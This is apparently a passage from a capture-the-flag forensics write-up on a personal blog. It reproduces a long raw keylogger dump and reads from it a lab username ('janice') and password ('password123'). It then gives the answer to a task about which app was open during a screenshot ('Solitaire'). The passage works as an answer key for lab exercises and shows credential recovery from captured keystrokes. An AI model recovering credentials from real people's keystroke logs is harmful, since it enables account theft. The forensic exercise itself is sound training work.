[KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [KEYCODE 186] [SHIFT] [KEYCODE 160] [KEYCODE 186] [SHIFT] [KEYCODE 160] [KEYCODE 186] [SHIFT] [KEYCODE 160] [KEYCODE 186] [SHIFT] [KEYCODE 160] [SPACE] [SPACE] [SPACE] [SPACE] [SPACE] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] J [KEYCODE 160] [SHIFT] J [KEYCODE 160] [SHIFT] J [KEYCODE 160] J A A A A [BACKSPACE] [BACKSPACE] [BACKSPACE] [KEYCODE 220] [BACKSPACE] [KEYCODE 220] [BACKSPACE] [KEYCODE 220] [BACKSPACE] J J J J J [BACKSPACE] [BACKSPACE] [BACKSPACE] [BACKSPACE] [BACKSPACE] [BACKSPACE] [BACKSPACE] [BACKSPACE] J J J A A A A N N N I I I C C C C E E E [ENTER] [ENTER] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] P [KEYCODE 160] [SHIFT] P [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] A A A A A A A A S A S A S A S S S S S S S S W W W W W O O O O O R R R R D D D D [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [KEYCODE 186] [SHIFT] [KEYCODE 160] [KEYCODE 186] [SHIFT] [KEYCODE 160] [KEYCODE 186] [SHIFT] [KEYCODE 160] [KEYCODE 186] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SPACE] [SPACE] [SPACE] [SPACE] [SPACE] [SPACE] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] [KEYCODE 160] [SHIFT] P [KEYCODE 160] [SHIFT] P [KEYCODE 160] [SHIFT] P [KEYCODE 160] [SHIFT] P [KEYCODE 160] [SHIFT] [KEYCODE 160] A A A A A A A S A S S S S S S S S S W W W W W O O R R R D D D D D 1 1 1 1 2 2 2 2 2 2 2 2 3 3 3 3 3 [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] S [KEYCODE 162] [CTRL] S [KEYCODE 162] [CTRL] S [KEYCODE 162] [CTRL] S [KEYCODE 162] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] P P P P A A A A A A S S S S S S S S W W W O O O O O R R R D D D [KEYCODE 190] [KEYCODE 190] [KEYCODE 190] T T T T T X X X X X T T T T [ENTER] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [KEYCODE 1] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] [KEYCODE 162] [CTRL] C

By Analysing the keyloger.txt we can see that username = janice and password = password123

Task 10

What app did Janice have open the last time she ran the “screenshot app”?

Solitaire

🐉 neospace ~

Explorer

📝 Latest Posts

Raspberry Pi Kali-Linux Headless Setup

before you code, learn how computers work